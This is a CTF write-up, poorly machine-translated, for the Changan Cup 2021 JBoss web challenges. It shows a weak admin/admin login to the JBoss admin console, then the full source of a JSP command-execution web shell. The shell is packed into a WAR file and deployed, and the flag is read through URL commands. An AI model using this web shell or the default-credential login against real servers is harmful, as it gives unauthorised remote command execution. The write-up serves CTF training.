CTF_ Web: Changan cup-2021 old but a little new & asuka

0x00 Old But A Little New

Two JBoss The topic is almost the same , The solution is the same , There is only one content in the test , Namely Jboss Upload in the background war package getshell.
The first is a jboss page .
hinder wiki And so on jboss Its official website , It has nothing to do with this question .

0x01 Weak password login

First path admin-console, The administrator console can be used directly admin、admin Weak password login , Find the deployment in the background war Where packages are uploaded .（ there shell.war It has been uploaded ）

0x02 Upload war package getshell

What is used here is TsengYUen Master's echo jsp In a word , Then use the command to package .

jar cvf shell.war 1.jsp

The content of one sentence is ：

<%
   if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

After successful deployment, view your own war package ：
Path is /shell/1.asp
Page link column Directory

http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=ls

direct cat flag that will do .

http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=cat%20flag

0x03 asuka

JBoss Series title , With last one JBoss The same solution , Use the same war Bag can . Command execution to get flag